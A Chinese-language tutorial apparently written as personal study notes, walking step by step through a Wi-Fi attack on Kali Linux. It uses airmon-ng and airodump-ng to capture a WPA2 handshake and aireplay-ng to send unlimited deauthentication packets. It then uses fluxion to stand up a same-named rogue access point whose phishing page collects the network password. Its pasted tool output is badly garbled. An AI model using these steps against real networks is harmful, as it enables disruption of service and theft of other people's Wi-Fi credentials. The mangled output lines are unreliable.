kali挂载无线网卡,kali搭建钓鱼网站
kali使用fluxion无线网络钓鱼浏览了所有关于fluxion的网络钓鱼使用教程,但都不太好。 本文是为了自己的复习而整理学习的,如果初学者有问题的话请指示。
硬件测试:笔记本电脑
1枚无限外接网卡
(需要两张网卡)
软件: fluxion
airmon
查看网卡airmon-ng
选择网卡的我正在使用WLAN0。 (WLAN0在电脑上附带网卡。 )
启动网卡监听airmon-ng start wlan0
查看网卡侦听信息airodump-ng wlan0mon
选择网络信息(照片不是这次包的截图) )。
BSSID PWR Beacons #Data, //schmbenccipherauthesside 03360403360073360073360093360503360 A8-1001-1 length 3360503360 d 23360 f 5: Fe 3360 fa 3360 B1 f 6: d 53360533604 e 33600933606 B-5891203360 wpa2ccmpskoneplus7pro
手册airodump-ng -c (频道CH )--bssid )-w /root (手册存储目录)获取wlan0mon参数:
-c指定通道编号
-指定bssid路由器bssid
-w指定抓持的手提包存储路径
最后,指定网卡连接器
ch3 ) [ elapsed :2 mins ] [ 2020-09-0800336054 ] bssidpwrrxqbeacons # data, //schmbenccipherauthessidf 6: d 53360533604 e 33600933606 B-3100841236053360 wpa2ccmpskoppok5bssidstationpwrratelostelostframesnon teramesnon 04e :0933606 b 2633608433607 e 3360833609:77-290 e-1e 016562 eapoloppokey 5f 63360 d 53360077-1e 016562 eapolopppok 5f 633603603606 f 607-1e 0607 e 33:0 e
为了得到握手报,开始攻击,打开外壳。 以前请不要关闭。
aireplay-ng -0 0(攻击次数0为无限次)-a BSSID -c )使用设备MAC地址STATION ) wlan0mon
参数说明:
-0攻击次数(-0 2即攻击2次,-0为无限次数) () ) ) ) ) )。
-a指定无线路由器BSSID
-c指定要强制断开连接的设备
最后,指定网卡连接器
root@yuan:~# aireplay-ng-0-a 50: d 2: f 5: Fe : fa : fa : B1-c 38:6 e :5 c :04: EC WLAN0mon 003:15333: 60f 5: Fe : fa : fa : fa : B1 (on channel 500336015336029 sending 64 directed deauth (code7) ) ) ) ) ) 652. EC ] [ 10|65a cks ] 00336015336029 sending 64 directed deauth (code7() ) ) ) ) ) ) ) ).ST MAC : [ 38:6 ] 3:6 e 33:
出现[ wpa handshake : f 63360 d 53360533604 e :0933606 b ],等待证明已获取握紧的包
在保存目录中,以. cap结尾的是握紧的包
找到fluxion目录./fluxion.sh并运行fluxion
选择中文(据说中文里有bug,如果英语好的话可以选择英语)。
选择“创建AP”。 创建同名的网络
选择要在其中搜索网络的网卡
选择频道(我一般是所有频道) )。
在扫描完你之前抓到包的网络后,按Ctrl C退出扫描,填写网络对应的序列号后回车
选择干扰钓鱼网站的网卡
然后,无脑选择3流氓AP - hostapd来到这里,第一个抓住了握力包的用处
填写你刚才抓住的紧握的包所附的名为. cap的文件目录。 (直接拖动是最快的。 )
回车里
选择cowpatty身份验证
选择“创建SSL证书”
选择断开原始网络连接
选择自己制作的钓鱼网页
将显示此页面,证明钓鱼WIFI已开始运行。 扫描WIFI原来的网络无法连接,只能自动连接到自己伪造的同名AP
手机连接成功后,在自动弹窗中输入密码进行身份验证。 生成包含密码和网络信息的文件,其中右上方的框包含提示
最后的成果
这次的测试网络都是自己的网络,这篇文章是学习用的。